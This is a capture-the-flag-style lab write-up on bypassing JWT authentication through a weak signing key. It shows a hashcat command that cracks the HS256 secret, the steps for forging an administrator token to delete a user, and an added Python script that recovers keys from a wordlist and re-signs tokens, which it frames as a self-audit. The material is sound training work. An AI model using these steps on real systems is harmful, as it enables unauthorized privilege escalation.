22.3 Lab: JWT authentication bypass via weak signing key
Description
This lab uses a JWT-based mechanism for handling sessions. It uses an extremely weak secret key to both sign and verify tokens. This can be easily brute-forced using a wordlist of common secrets.
To solve the lab, first brute-force the website’s secret key. Once you’ve obtained this, use it to sign a modified session token that gives you access to the admin panel at /admin, then delete the user carlos.
You can log in to your own account using the following credentials: wiener:peter
Tip
We recommend familiarizing yourself with how to work with JWTs in Burp Suite before attempting this lab.
We also recommend using hashcat to brute-force the secret key. For details on how to do this, see Brute forcing secret keys using hashcat.
Solution
Part 1 — Brute-force the secret key
- Turn on the proxy in your browser, turn off Intercept in Burp, and open the HTTP history tab.
- Log in to your account.
- Send the GET /my-account?id=wiener request to Repeater.
- Copy the JWT session cookie, open a terminal, and run the following hashcat command to crack the secret key (replace JWT_COOKIE with the copied token):
hashcat -a 0 -m 16500 "JWT_COOKIE" /usr/share/seclists/Passwords/scraped-JWT-secrets.txt
- If everything works correctly, this should reveal that the weak secret is secret1.
Part 2 — Modify and sign the JWT
- Go to https://jwt.io and paste the JWT cookie that we copied from the repeater.
- In the Payload box, change the value of sub from wiener to administrator.
- In the Verify Signature box, paste the key secret1 (or whichever key hashcat cracked) into the “your-256-bit-secret” field.
- Now copy the final JWT on the left and go back to Repeater.
- Change the path to /admin/delete?username=carlos and replace the JWT cookie with the one copied from jwt.io.
- Send the request and the lab will be solved.
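What the hashcat and jwt.io steps above do under the hood, as an added Python example that is not part of the original write-up: a wordlist check that recovers a weak HS256 key, and the re-signing step that shows why key recovery defeats the token's integrity. The wordlist, header and claims are constructed here (not the lab's real values); running `audit` against a random 256-bit key and getting `None` back is the check to apply to your own signing secret.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

# Constructed stand-in for the SecLists wordlist the write-up points hashcat at
WORDLIST = ["password", "123456", "secret", "secret1", "changeme"]
HEADER = {"alg": "HS256", "typ": "JWT"}

def b64url_encode(data: bytes) -> str:
    # JWTs use unpadded base64url (RFC 7515)
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_hs256(header: dict, payload: dict, secret: str) -> str:
    # Signing input is "<b64url(header)>.<b64url(payload)>"; HS256 is HMAC-SHA256 over it
    parts = [b64url_encode(json.dumps(p, separators=(",", ":")).encode()) for p in (header, payload)]
    signing_input = ".".join(parts)
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)

def verify_hs256(token: str, secret: str) -> bool:
    head, body, sig = token.split(".")
    expected = hmac.new(secret.encode(), f"{head}.{body}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig))

def recover_secret(token: str, wordlist: list) -> Optional[str]:
    # The check hashcat mode 16500 performs: try each candidate as the HMAC key
    return next((w for w in wordlist if verify_hs256(token, w)), None)

def resign_with_claims(token: str, changes: dict, secret: str) -> str:
    # The jwt.io step: keep the header, edit the payload claims, re-sign with the recovered key
    head, body, _ = token.split(".")
    payload = json.loads(b64url_decode(body))
    payload.update(changes)
    return sign_hs256(json.loads(b64url_decode(head)), payload, secret)

def audit(secret: str) -> dict:
    # Issue a token for wiener under `secret` and report whether the wordlist recovers the key
    token = sign_hs256(HEADER, {"sub": "wiener"}, secret)
    found = recover_secret(token, WORDLIST)
    forged = resign_with_claims(token, {"sub": "administrator"}, found) if found else None
    return {"recovered": found, "forged_verifies": bool(forged) and verify_hs256(forged, secret)}

if __name__ == "__main__":
    print(audit("secret1"), audit(secrets.token_hex(32)))
```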
Thank you for Reading!
Happy Ethical Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng